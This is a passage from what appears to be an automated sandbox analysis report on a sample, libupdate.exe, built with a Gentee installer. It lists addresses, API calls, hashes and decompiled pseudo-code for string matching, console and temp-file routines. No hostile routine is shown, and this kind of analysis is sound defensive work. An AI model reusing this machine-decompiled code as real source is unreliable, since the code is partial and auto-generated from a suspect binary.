                                                                    0x100012cc
                                                                    0x100012d4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100012d7
                                                                    0x100012d9
                                                                    0x100012db
                                                                    0x100012de
                                                                    0x100012e0
                                                                    0x100012e8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100012eb
                                                                    0x100012ee
                                                                    0x100012f2
                                                                    0x100012f5
                                                                    0x100012f8
                                                                    0x10001300
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001303
                                                                    0x10001306
                                                                    0x10001307
                                                                    0x10001307
                                                                    0x10001307
                                                                    0x10001309
                                                                    0x1000130c
                                                                    0x1000130f
                                                                    0x10001317
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000131a
                                                                    0x1000131d
                                                                    0x1000131e
                                                                    0x1000131e
                                                                    0x1000131e
                                                                    0x10001320
                                                                    0x10001323
                                                                    0x10001326
                                                                    0x1000132e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001331
                                                                    0x10001334
                                                                    0x10001337
                                                                    0x1000133f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001342
                                                                    0x10001345
                                                                    0x10001348
                                                                    0x10001350
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001353
                                                                    0x1000135e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001361
                                                                    0x10001364
                                                                    0x10001369
                                                                    0x10001371
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001374
                                                                    0x10001377
                                                                    0x1000137c
                                                                    0x1000137f
                                                                    0x10001387
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000138a
                                                                    0x10001395
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001398
                                                                    0x1000139b
                                                                    0x100013a0
                                                                    0x100013a8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100013ab
                                                                    0x100013ae
                                                                    0x100013b3
                                                                    0x100013b6
                                                                    0x100013bd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100013c0
                                                                    0x100013c4
                                                                    0x100013cc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100013cf
                                                                    0x100013d3
                                                                    0x100013db
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100013de
                                                                    0x100013e0
                                                                    0x100013e1
                                                                    0x100013e4
                                                                    0x100013eb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100013ee
                                                                    0x100013f1
                                                                    0x100013f9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100013fc
                                                                    0x100013ff
                                                                    0x10001407
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000140a
                                                                    0x10001415
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001418
                                                                    0x1000141c
                                                                    0x10001424
                                                                    0x10001428
                                                                    0x10001430
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001433
                                                                    0x10001437
                                                                    0x1000143f
                                                                    0x10001443
                                                                    0x1000144b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000144e
                                                                    0x10001451
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100011a7
                                                                    0x00000000

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: _ftol
                                                                    • String ID:
                                                                    • API String ID: 2545261903-0
                                                                    • Opcode ID: f0b3429af6d82819c45c162e22c1f9801bdbca7f3417f1e8cbe6ddec54b0f969
                                                                    • Instruction ID: dbb1350d90862c38006c1f3f9d3ba85d2949ed274592c816424a895a3dde99f9
                                                                    • Opcode Fuzzy Hash: f0b3429af6d82819c45c162e22c1f9801bdbca7f3417f1e8cbe6ddec54b0f969
                                                                    • Instruction Fuzzy Hash: A991A8BA6086528AD704EF1EF8914DAFBA0EFE4726F54857BD6C482300E331457DCBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 10004F80, Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E10004F80(intOrPtr* _a4, intOrPtr* _a8) {
				signed int _t11;
				intOrPtr _t12;
				CHAR* _t17;
				intOrPtr _t21;
				CHAR* _t22;
				intOrPtr* _t34;
				intOrPtr* _t35;

				_t35 = _a8;
				_t34 = _a4;
				_a8 = _t35 + 1;
				while(1) {
					_t11 =  *_t34;
					if(_t11 == 0) {
						break;
					}
					if( *_t35 == 0) {
						L14:
						return 0;
					} else {
						_t17 = CharLowerA(_t11 & 0x000000ff);
						if(_t17 == CharLowerA(0)) {
							L9:
							_t34 = _t34 + 1;
							_t35 = _t35 + 1;
							_a8 = _a8 + 1;
							continue;
						} else {
							_t21 =  *_t35;
							if(_t21 == 0x3f) {
								goto L9;
							} else {
								if(_t21 != 0x2a) {
									goto L14;
								} else {
									_t22 = CharLowerA(0);
									if(_t22 != CharLowerA(0) || E10004F80(_t34, _a8) == 0) {
										_t34 = _t34 + 1;
										continue;
									} else {
										L13:
										return 1;
									}
								}
							}
						}
					}
					L15:
				}
				_t12 =  *_t35;
				if(_t12 == 0 || _t12 == 0x2a &&  *((intOrPtr*)(_t35 + 1)) == 0) {
					goto L13;
				} else {
					goto L14;
				}
				goto L15;
			}










                                                                    0x10004f89
                                                                    0x10004f8e
                                                                    0x10004f95
                                                                    0x10004f99
                                                                    0x10004f99
                                                                    0x10004f9d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10004fa2
                                                                    0x1000501a
                                                                    0x1000501d
                                                                    0x10004fa4
                                                                    0x10004faa
                                                                    0x10004fb7
                                                                    0x10004fed
                                                                    0x10004ff1
                                                                    0x10004ff2
                                                                    0x10004ff4
                                                                    0x00000000
                                                                    0x10004fb9
                                                                    0x10004fb9
                                                                    0x10004fbd
                                                                    0x00000000
                                                                    0x10004fbf
                                                                    0x10004fc1
                                                                    0x00000000
                                                                    0x10004fc3
                                                                    0x10004fc8
                                                                    0x10004fd9
                                                                    0x10004fea
                                                                    0x00000000
                                                                    0x1000500e
                                                                    0x1000500e
                                                                    0x10005014
                                                                    0x10005014
                                                                    0x10004fd9
                                                                    0x10004fc1
                                                                    0x10004fbd
                                                                    0x10004fb7
                                                                    0x00000000
                                                                    0x10004fa2
                                                                    0x10004ffa
                                                                    0x10004ffe
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                    • CharLowerA.USER32(?), ref: 10004FAA
                                                                    • CharLowerA.USER32(00000000), ref: 10004FB3
                                                                    • CharLowerA.USER32(00000000), ref: 10004FC8
                                                                    • CharLowerA.USER32(00000000), ref: 10004FD5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CharLower
                                                                    • String ID:
                                                                    • API String ID: 1615517891-0
                                                                    • Opcode ID: 285a1d7726aef36330d28cb51e1bb2515d9540c5ae1e0432bc58940cea301f56
                                                                    • Instruction ID: 803ff84b82c36d7cb0ac522535ba80d46392a79b4a5de3cf2bd2c6b7ac3af2e1
                                                                    • Opcode Fuzzy Hash: 285a1d7726aef36330d28cb51e1bb2515d9540c5ae1e0432bc58940cea301f56
                                                                    • Instruction Fuzzy Hash: 501129B55082830EE310CE759480ABFBBD9DF892C5F11483EE4D1C3106E912DC86D7A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 10005E70, Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 79%
                                                                    			E10005E70(void* __edx) {
				void _v8;
				long _v12;
				long _v16;
				intOrPtr* _t5;
				void* _t17;
				void* _t19;
				void* _t21;
				void* _t22;
				DWORD* _t26;

				_t26 =  &_v16;
				_t5 =  *0x1000d344; // 0x0
				if(_t5 == 0) {
					if( *0x1000c0bc == 0xffffffff) {
						E10005D80(__edx, 1);
					}
					_t17 =  *0x1000c0bc; // 0xffffffff
					GetConsoleMode(_t17, _t26);
					_t21 =  *0x1000c0bc; // 0xffffffff
					SetConsoleMode(_t21, 0);
					_t22 =  *0x1000c0bc; // 0xffffffff
					ReadConsoleA(_t22,  &_v8, 1,  &_v12, 0);
					_t19 =  *0x1000c0bc; // 0xffffffff
					SetConsoleMode(_t19, _v16);
					return _v8 & 0x000000ff;
				} else {
					return  *_t5(0, 1);
				}
			}












                                                                    0x10005e75
                                                                    0x10005e70
                                                                    0x10005e7a
                                                                    0x10005e8d
                                                                    0x10005e91
                                                                    0x10005e91
                                                                    0x10005e96
                                                                    0x10005ea3
                                                                    0x10005ea9
                                                                    0x10005eb8
                                                                    0x10005eba
                                                                    0x10005ecf
                                                                    0x10005ed5
                                                                    0x10005ee1
                                                                    0x10005ef0
                                                                    0x10005e7c
                                                                    0x10005e85
                                                                    0x10005e85

                                                                    APIs
                                                                    • GetConsoleMode.KERNEL32(FFFFFFFF,00000000,?,?,?,?,100043DF), ref: 10005EA3
                                                                    • SetConsoleMode.KERNEL32(FFFFFFFF,00000000,?,?,?,100043DF), ref: 10005EB8
                                                                    • ReadConsoleA.KERNEL32(FFFFFFFF,?,00000001,?,00000000,?,?,?,100043DF), ref: 10005ECF
                                                                    • SetConsoleMode.KERNEL32(FFFFFFFF,?,?,?,?,100043DF), ref: 10005EE1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Console$Mode$Read
                                                                    • String ID:
                                                                    • API String ID: 109265299-0
                                                                    • Opcode ID: 83161c0ba534bb5bb16d501c264478f4720bd276e76e6166f4c934cfbf79780e
                                                                    • Instruction ID: 277fc34a9abc0aecee5556ef167951661a589cd638a54e99b0309d48df3b486c
                                                                    • Opcode Fuzzy Hash: 83161c0ba534bb5bb16d501c264478f4720bd276e76e6166f4c934cfbf79780e
                                                                    • Instruction Fuzzy Hash: DD01A275600329EFF310DB64CCC5FA773A9E784780F40460AFA54822E8DAB5E844CB72
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 10005D80, Relevance: 6.0, APIs: 4, Instructions: 30memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 90%
                                                                    			E10005D80(signed int __edx, intOrPtr _a4) {
				struct _cpinfo _v20;
				int _t6;
				void* _t8;
				signed int _t10;
				intOrPtr _t12;

				_t10 = __edx;
				_t12 = _a4;
				if(_t12 == 0) {
					_t6 = GetCPInfo(0,  &_v20);
					asm("sbb edx, edx");
					 *0x1000d324 =  ~_t10;
				} else {
					_t6 = AllocConsole();
				}
				if(( *0x1000d320 & 0x00000001) != 0 || _t12 != 0) {
					 *0x1000c0b8 = GetStdHandle(0xfffffff5);
					_t8 = GetStdHandle(0xfffffff6);
					 *0x1000c0bc = _t8;
					return _t8;
				}
				return _t6;
			}








                                                                    0x10005d80
                                                                    0x10005d84
                                                                    0x10005d8a
                                                                    0x10005d9b
                                                                    0x10005daa
                                                                    0x10005dae
                                                                    0x10005d8c
                                                                    0x10005d8c
                                                                    0x10005d8c
                                                                    0x10005dbb
                                                                    0x10005dcd
                                                                    0x10005dd2
                                                                    0x10005dd4
                                                                    0x00000000
                                                                    0x10005dd4
                                                                    0x10005ddd

                                                                    APIs
                                                                    • AllocConsole.KERNEL32 ref: 10005D8C
                                                                    • GetCPInfo.KERNEL32(00000000,?), ref: 10005D9B
                                                                    • GetStdHandle.KERNEL32(000000F5), ref: 10005DC9
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 10005DD2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Handle$AllocConsoleInfo
                                                                    • String ID:
                                                                    • API String ID: 2979881050-0
                                                                    • Opcode ID: 79bd74d05196f55a5010c0ee49bf5578b07980fdf9a96f42d034c8fc4217eeeb
                                                                    • Instruction ID: 567dc61beafc005e892ce19f8db23f18483b42cedde438cadc3bdd48228512a6
                                                                    • Opcode Fuzzy Hash: 79bd74d05196f55a5010c0ee49bf5578b07980fdf9a96f42d034c8fc4217eeeb
                                                                    • Instruction Fuzzy Hash: E1F0B471C082358BF714DF68CC84B5B3BE4EB44790F11431BE855472A9D7314848CBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401890, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 23stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 79%
                                                                    			E00401890(CHAR* _a4) {
				signed int _t3;
				CHAR* _t9;

				_t9 = _a4;
				if(lstrcmpA(_t9, "lzge_decode") != 0) {
					_t3 = lstrcmpA(_t9, "launcher_get");
					asm("sbb eax, eax");
					return  !( ~_t3) & E00401830;
				} else {
					return E004012B0;
				}
			}





                                                                    0x00401891
                                                                    0x004018a6
                                                                    0x004018b8
                                                                    0x004018bc
                                                                    0x004018c7
                                                                    0x004018a9
                                                                    0x004018af
                                                                    0x004018af

                                                                    APIs
                                                                    • lstrcmpA.KERNEL32(?,lzge_decode), ref: 004018A2
                                                                    • lstrcmpA.KERNEL32(?,launcher_get), ref: 004018B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.322893653.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.322884038.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.322913999.0000000000402000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.322924635.0000000000403000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.322942646.0000000000404000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: lstrcmp
                                                                    • String ID: launcher_get$lzge_decode
                                                                    • API String ID: 1534048567-2981319874
                                                                    • Opcode ID: 5f1b5b9c6aa848f87772fa5498ba0eb44c79c04b265534716dc23dbc529ac21d
                                                                    • Instruction ID: b58090d80eb74edd8f84a636f1a44c18bb862bfbb85db56f3fac8cdddd56031d
                                                                    • Opcode Fuzzy Hash: 5f1b5b9c6aa848f87772fa5498ba0eb44c79c04b265534716dc23dbc529ac21d
                                                                    • Instruction Fuzzy Hash: 64D01763295621219211656EAC01EDB929D4AA5BA43068637F600F22E8C2BC9A8285AC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 100016C0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E100016C0() {
				intOrPtr* _t57;
				intOrPtr _t58;
				intOrPtr _t60;
				intOrPtr _t67;
				intOrPtr* _t70;
				signed int _t74;
				void* _t75;

				_t60 =  *((intOrPtr*)(_t75 + 8));
				_t67 =  *((intOrPtr*)(_t60 + 8));
				_t57 =  *((intOrPtr*)(_t67 - 4));
				_t70 =  *((intOrPtr*)(_t67 - 0xc));
				_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t60 + 4)))) + 0xffffff6c;
				if(_t74 > 0xd) {
					L18:
					_t58 =  *_t70;
					 *((intOrPtr*)(_t67 - 0xc)) = _t58;
					 *((intOrPtr*)(_t67 - 8)) =  *((intOrPtr*)(_t70 + 4));
					return _t58;
				} else {
					switch( *((intOrPtr*)(_t74 * 4 +  &M10001870))) {
						case 0:
							 *_t57 =  *_t57 + 1;
							_t71 =  *((intOrPtr*)(_t57 + 4));
							asm("adc esi, 0x0");
							goto L5;
						case 1:
							__ecx =  *__eax;
							 *(__edi - 4) =  *__eax;
							__edx =  *(__eax + 4);
							 *__edi =  *(__eax + 4);
							 *__eax =  *__eax + 1;
							 *__eax =  *__eax + 1;
							__ecx =  *(__eax + 4);
							asm("adc ecx, 0x0");
							return __eax;
							goto L19;
						case 2:
							 *__eax =  *__eax + 0xffffffff;
							 *__eax =  *__eax + 0xffffffff;
							__esi =  *(__eax + 4);
							asm("adc esi, 0xffffffff");
							L5:
							 *((intOrPtr*)(_t57 + 4)) = _t71;
							_t64 =  *((intOrPtr*)(_t60 + 8)) - 4;
							 *_t64 =  *_t57;
							_t59 =  *((intOrPtr*)(_t57 + 4));
							 *((intOrPtr*)(_t64 + 4)) = _t59;
							return _t59;
							goto L19;
						case 3:
							__ecx =  *__eax;
							 *(__edi - 4) =  *__eax;
							__edx =  *(__eax + 4);
							 *__edi =  *(__eax + 4);
							 *__eax =  *__eax + 0xffffffff;
							 *__eax =  *__eax + 0xffffffff;
							__ecx =  *(__eax + 4);
							asm("adc ecx, 0xffffffff");
							return __eax;
							goto L19;
						case 4:
							 *__esi =  *__esi + __ecx;
							__eax = __esi[1];
							asm("adc eax, edx");
							__eax =  *__esi;
							 *(__edi - 0xc) = __eax;
							__ecx = __esi[1];
							 *(__edi - 8) = __esi[1];
							return __eax;
							goto L19;
						case 5:
							 *__esi =  *__esi - __ecx;
							__eax = __esi[1];
							asm("sbb eax, edx");
							__eax =  *__esi;
							 *(__edi - 0xc) = __eax;
							__ecx = __esi[1];
							 *(__edi - 8) = __esi[1];
							return __eax;
							goto L19;
						case 6:
							__eax = __esi[1];
							__ecx =  *__esi;
							__eax = E10009110( *__esi, __esi[1],  *__esi, __edx);
							goto L17;
						case 7:
							__eax =  *__esi;
							__edx = __esi[1];
							__eax = E100090A0( *__esi, __esi[1], __ecx, __esi[1]);
							goto L17;
						case 8:
							__edx =  *__esi;
							__ecx = __esi[1];
							__eax = E10009020( *__esi, __esi[1], __esi[1],  *__esi);
							goto L17;
						case 9:
							 *__esi =  *__esi & __ecx;
							__esi[1] = __esi[1] & __edx;
							__esi[1] = __esi[1] & __edx;
							__eax =  *__esi;
							 *(__edi - 0xc) = __eax;
							__ecx = __esi[1];
							 *(__edi - 8) = __esi[1];
							return __eax;
							goto L19;
						case 0xa:
							 *__esi =  *__esi | __ecx;
							__esi[1] = __esi[1] | __edx;
							__esi[1] = __esi[1] | __edx;
							__eax =  *__esi;
							 *(__edi - 0xc) = __eax;
							__ecx = __esi[1];
							 *(__edi - 8) = __esi[1];
							return __eax;
							goto L19;
						case 0xb:
							 *__esi =  *__esi ^ __ecx;
							__esi[1] = __esi[1] ^ __edx;
							__esi[1] = __esi[1] ^ __edx;
							__eax =  *__esi;
							 *(__edi - 0xc) = __eax;
							__ecx = __esi[1];
							 *(__edi - 8) = __esi[1];
							return __eax;
							goto L19;
						case 0xc:
							__eax =  *__esi;
							__edx = __esi[1];
							__eax = E10009000( *__esi, __ecx, __edx);
							goto L17;
						case 0xd:
							__eax =  *__esi;
							__edx = __esi[1];
							__eax = E10008FE0( *__esi, __ecx, __edx);
							L17:
							 *__esi = __eax;
							__esi[1] = __edx;
							goto L18;
					}
				}
				L19:
			}










                                                                    0x100016c1
                                                                    0x100016cb
                                                                    0x100016d1
                                                                    0x100016d7
                                                                    0x100016da
                                                                    0x100016e5
                                                                    0x1000185b
                                                                    0x1000185b
                                                                    0x1000185d
                                                                    0x10001863
                                                                    0x1000186a
                                                                    0x100016eb
                                                                    0x100016eb
                                                                    0x00000000
                                                                    0x100016f7
                                                                    0x100016f9
                                                                    0x100016fc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001701
                                                                    0x10001703
                                                                    0x10001706
                                                                    0x10001709
                                                                    0x1000170d
                                                                    0x10001711
                                                                    0x10001713
                                                                    0x10001716
                                                                    0x1000171f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001724
                                                                    0x10001727
                                                                    0x10001729
                                                                    0x1000172c
                                                                    0x1000172f
                                                                    0x1000172f
                                                                    0x10001737
                                                                    0x1000173c
                                                                    0x1000173e
                                                                    0x10001743
                                                                    0x10001746
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001749
                                                                    0x1000174b
                                                                    0x1000174e
                                                                    0x10001751
                                                                    0x10001755
                                                                    0x10001759
                                                                    0x1000175b
                                                                    0x1000175e
                                                                    0x10001767
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000176e
                                                                    0x10001770
                                                                    0x10001773
                                                                    0x10001778
                                                                    0x1000177a
                                                                    0x1000177d
                                                                    0x10001780
                                                                    0x10001787
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000178e
                                                                    0x10001790
                                                                    0x10001793
                                                                    0x10001798
                                                                    0x1000179a
                                                                    0x1000179d
                                                                    0x100017a0
                                                                    0x100017a7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100017aa
                                                                    0x100017af
                                                                    0x100017b3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100017bd
                                                                    0x100017c0
                                                                    0x100017c6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100017d1
                                                                    0x100017d4
                                                                    0x100017d9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100017e4
                                                                    0x100017e9
                                                                    0x100017eb
                                                                    0x100017ee
                                                                    0x100017f0
                                                                    0x100017f3
                                                                    0x100017f6
                                                                    0x100017fd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001804
                                                                    0x10001809
                                                                    0x1000180b
                                                                    0x1000180e
                                                                    0x10001810
                                                                    0x10001813
                                                                    0x10001816
                                                                    0x1000181d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001824
                                                                    0x10001829
                                                                    0x1000182b
                                                                    0x1000182e
                                                                    0x10001830
                                                                    0x10001833
                                                                    0x10001836
                                                                    0x1000183d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001840
                                                                    0x10001842
                                                                    0x10001845
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000184c
                                                                    0x1000184e
                                                                    0x10001851
                                                                    0x10001856
                                                                    0x10001856
                                                                    0x10001858
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100016eb
                                                                    0x00000000

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: __aulldiv
                                                                    • String ID: PQXy$QRBx
                                                                    • API String ID: 3732870572-156971322
                                                                    • Opcode ID: 7d0c917905162821b20e92d50607446e16b6ec4d67759af67f5b776bd5cc88ce
                                                                    • Instruction ID: fecae9029ccbbfb1907bd0fd8daed38a12235495696e2410105cb9617baf31f9
                                                                    • Opcode Fuzzy Hash: 7d0c917905162821b20e92d50607446e16b6ec4d67759af67f5b776bd5cc88ce
                                                                    • Instruction Fuzzy Hash: EA61DDB6605A00CFD324CF5DE980916FBE5FF98721324CA6EE699CB760D732A810CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 10005C40, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 55%
                                                                    			E10005C40(void* __ebx, void* __edi, void* __esi, void* __ebp, void* __eflags) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v36;
				void* _t7;
				intOrPtr _t14;
				signed int _t24;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t41;

				_t40 = __ebp;
				_t36 = __edi;
				_t32 = __ebx;
				_t41 =  &_v16;
				_t7 = E10004D00(0x1000d32c);
				_t43 = _t7;
				if(_t7 != 0) {
					return 0x1000d32c;
				} else {
					_t38 = 0;
					E10005C00(__ebx, E10004BF0(_t43, _t41));
					if(( *0x1000d320 & 0x00000010) == 0) {
						 *0x1000d328 = 0;
					} else {
						 *0x1000d328 = GetTickCount() & 0x000000ff;
					}
					while(1) {
						E10004A80(0x1000d32c);
						_t33 =  *0x1000d328; // 0xda
						_push(_t33);
						_push(0x5c);
						_push(_v20);
						_push("%s%cgentee%02X.tmp");
						E10004D10(0x1000d32c);
						_t41 = _t41 + 0x14;
						_t14 = E10005AF0(0x1000d32c, 6);
						 *0x1000d33c = _t14;
						_push(0x1000d32c);
						if(_t14 != 0) {
							break;
						}
						if(E10005BF0() == 0xffffffff && _t38 == 0) {
							E10004AA0( &_v16, "c:\\temp");
							_t33 =  &_v24;
							E10005960( &_v24);
							_t38 = 1;
						}
						_t24 =  *0x1000d328; // 0xda
						_t48 = _t24 - 0xffff;
						 *0x1000d328 = _t24 + 1;
						if(_t24 > 0xffff) {
							_push(0x1000d32c);
							_push(0x30007);
							E100040A0(_t32, _t33, _t36, _t38, _t48);
							_t41 = _t41 + 8;
						}
					}
					_t16 = E10004D00() - 4;
					__eflags = E10004D00() - 4;
					E10004EA0(0x1000d32c, _t16);
					E100059A0(_t40, __eflags, 0x1000d32c);
					E10005960(0x1000d32c);
					E10003430( &_v36);
					return 0x1000d32c;
				}
			}














                                                                    0x10005c40
                                                                    0x10005c40
                                                                    0x10005c40
                                                                    0x10005c40
                                                                    0x10005c48
                                                                    0x10005c4d
                                                                    0x10005c4f
                                                                    0x10005d70
                                                                    0x10005c55
                                                                    0x10005c5b
                                                                    0x10005c63
                                                                    0x10005c6f
                                                                    0x10005c83
                                                                    0x10005c71
                                                                    0x10005c7c
                                                                    0x10005c7c
                                                                    0x10005c8d
                                                                    0x10005c92
                                                                    0x10005c97
                                                                    0x10005ca1
                                                                    0x10005ca2
                                                                    0x10005ca4
                                                                    0x10005ca5
                                                                    0x10005caf
                                                                    0x10005cb4
                                                                    0x10005cbe
                                                                    0x10005cc5
                                                                    0x10005cca
                                                                    0x10005ccf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10005cd9
                                                                    0x10005ce9
                                                                    0x10005cee
                                                                    0x10005cf3
                                                                    0x10005cf8
                                                                    0x10005cf8
                                                                    0x10005cfd
                                                                    0x10005d05
                                                                    0x10005d0b
                                                                    0x10005d10
                                                                    0x10005d16
                                                                    0x10005d1b
                                                                    0x10005d20
                                                                    0x10005d25
                                                                    0x10005d25
                                                                    0x10005d10
                                                                    0x10005d32
                                                                    0x10005d32
                                                                    0x10005d3b
                                                                    0x10005d45
                                                                    0x10005d4f
                                                                    0x10005d59
                                                                    0x10005d67
                                                                    0x10005d67

                                                                    APIs
                                                                      • Part of subcall function 10005C00: GetTempPathA.KERNEL32(00000400,?,?,00000400,00000000,10005C68,00000000,00000000,?,1000D32C,10006518,?,?,?,?,?), ref: 10005C18
                                                                    • GetTickCount.KERNEL32 ref: 10005C71
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CountPathTempTick
                                                                    • String ID: %s%cgentee%02X.tmp$c:\temp
                                                                    • API String ID: 536023709-1620203176
                                                                    • Opcode ID: 9545025e1248976237a9ac63636d111ce3a4898ca4c58a7d92d227503dd02c18
                                                                    • Instruction ID: 64502b199535dded57bf49a6d61c7b50f0ce444720b67ce1b81255a0c8b663d4
                                                                    • Opcode Fuzzy Hash: 9545025e1248976237a9ac63636d111ce3a4898ca4c58a7d92d227503dd02c18
                                                                    • Instruction Fuzzy Hash: 6721A4B9D00310AAF210FBB49C86FBF3198DB047D5FC10526FA459219EEB35AA048777
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Analysis Process: libupdate.exe PID: 4568 Parent PID: 5144 libupdate.exeCOMMON

                                                                    Executed Functions

                                                                    Function 004B5114, Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 165libraryloaderCOMMON
